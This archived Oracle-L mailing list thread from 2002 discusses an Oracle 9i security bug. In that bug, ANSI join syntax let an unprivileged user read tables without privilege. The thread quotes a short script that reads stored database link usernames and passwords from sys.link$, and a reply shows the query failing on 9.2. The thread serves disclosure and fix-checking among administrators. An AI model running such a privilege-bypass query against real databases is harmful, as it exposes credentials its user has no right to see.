Oracle FAQ Your Portal to the Oracle Knowledge Grid
HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US
 

Home -> Community -> Mailing Lists -> Oracle-L -> Re: security bug - join syntax

Re: security bug - join syntax

From: Igor Neyman <ineyman_at_perceptron.com>
Date: Fri, 19 Jul 2002 11:34:47 -0800
Message-ID: <F001.0049CF37.20020719113447@fatcity.com> 





No, it's fixed in 9.2.:



SQLWKS> create user us1 identified by us1;
Statement processed.


SQLWKS> grant create session to us1;


Statement processed.


SQLWKS>



SQLWKS> connect us1/us1_at_af1;


Connected.

SQLWKS>
SQLWKS> select userid, password from
     2> sys.link$ cross join dual;




sys.link$ cross join dual


    *


ORA-00942: table or view does not exist


SQLWKS>



Igor Neyman, OCP DBA


ineyman_at_perceptron.com







> Is this still a problem in 9iR2? I do not have it installed yet :(

>

> - Kirti

>

> > -----Original Message-----

> > From: Jared.Still_at_radisys.com [SMTP:Jared.Still_at_radisys.com]

> > Sent: Friday, July 19, 2002 12:05 PM

> > To: Multiple recipients of list ORACLE-L

> > Subject: Re: security bug - join syntax

> >

> > Thanks Linda.

> >

> > Usenet seems to be a little behind the curve though.

> >

> > Jonathan Lewis discovered this and posted on the list

> > ( you saw it here first! ) over a month ago.

> >

> > Jared

> >

> >

> >

> >

> >

> > Linda.Miller-Coker_at_jpmorgan.com

> > Sent by: root_at_fatcity.com

> > 07/19/2002 09:23 AM

> > Please respond to ORACLE-L

> >

> >

> >         To:     Multiple recipients of list ORACLE-L

> > <ORACLE-L_at_fatcity.com>

> >         cc:

> >         Subject:        Re: security bug - join syntax

> >

> >

> >

> > This just in from comp.databases.oracle.server.

> >

> > See metalink bug 2121935.

> >

> > Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc)

> > allows you to view data from tables on which you have no

> > privilege.  For example, try this COMPLETE script:

> >

> > connect / as sysdba

> > create user us1 identified by us1;

> > grant create session to us1;

> >

> > connect us1/us1

> >

> > select userid, password

> > from

> >         sys.link$ cross join dual

> > ;

> >

> >

> >

> >

> > "Adams, Matthew (GEA, MABG, 088130)"

<MATT.ADAMS_at_APPL.GE.COM>@fatcity.com


> > on 07/19/2002 11:04:17 AM

> >

> > Please respond to ORACLE-L_at_fatcity.com

> >

> >

> >

> > Sent by:  root_at_fatcity.com

> >

> >

> > To:   Multiple recipients of list ORACLE-L <ORACLE-L_at_fatcity.com>

> > cc:

> >

> >

> >

> >

> > Anybody remember the bug number for the security issue

> > with the new join syntax in 9i?

> >

> > ----

> > Matt Adams - GE Appliances - matt.adams_at_appl.ge.com

> > The ozone layer or cheese in a spray can.

> > Don't make me choose.

> >

> >

> >

> >

> > --

> > Please see the official ORACLE-L FAQ: http://www.orafaq.com

> > --

> > Author:

> >   INET: Linda.Miller-Coker_at_jpmorgan.com

> >

> > Fat City Network Services    -- (858) 538-5051  FAX: (858) 538-5051

> > San Diego, California        -- Public Internet access / Mailing Lists

> > --------------------------------------------------------------------

> > To REMOVE yourself from this mailing list, send an E-Mail message

> > to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in

> > the message BODY, include a line containing: UNSUB ORACLE-L

> > (or the name of mailing list you want to be removed from).  You may

> > also send the HELP command for other information (like subscribing).

> >

> >

> >

> > --

> > Please see the official ORACLE-L FAQ: http://www.orafaq.com

> > --

> > Author:

> >   INET: Jared.Still_at_radisys.com

> >

> > Fat City Network Services    -- (858) 538-5051  FAX: (858) 538-5051

> > San Diego, California        -- Public Internet access / Mailing Lists

> > --------------------------------------------------------------------

> > To REMOVE yourself from this mailing list, send an E-Mail message

> > to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in

> > the message BODY, include a line containing: UNSUB ORACLE-L

> > (or the name of mailing list you want to be removed from).  You may

> > also send the HELP command for other information (like subscribing).

> --

> Please see the official ORACLE-L FAQ: http://www.orafaq.com

> --

> Author: Deshpande, Kirti

>   INET: kirti.deshpande_at_verizon.com

>

> Fat City Network Services    -- (858) 538-5051  FAX: (858) 538-5051

> San Diego, California        -- Public Internet access / Mailing Lists

> --------------------------------------------------------------------

> To REMOVE yourself from this mailing list, send an E-Mail message

> to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in

> the message BODY, include a line containing: UNSUB ORACLE-L

> (or the name of mailing list you want to be removed from).  You may

> also send the HELP command for other information (like subscribing).



-- 
Please see the official ORACLE-L FAQ: http://www.orafaq.com
-- 
Author: Igor Neyman
  INET: ineyman_at_perceptron.com

Fat City Network Services    -- (858) 538-5051  FAX: (858) 538-5051
San Diego, California        -- Public Internet access / Mailing Lists
--------------------------------------------------------------------
To REMOVE yourself from this mailing list, send an E-Mail message
to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
the message BODY, include a line containing: UNSUB ORACLE-L
(or the name of mailing list you want to be removed from).  You may
also send the HELP command for other information (like subscribing).


Received on Fri Jul 19 2002 - 14:34:47 CDT












Original text of this message













  HOME |
  ASK QUESTION |
  ADD INFO |
  SEARCH |
  E-MAIL US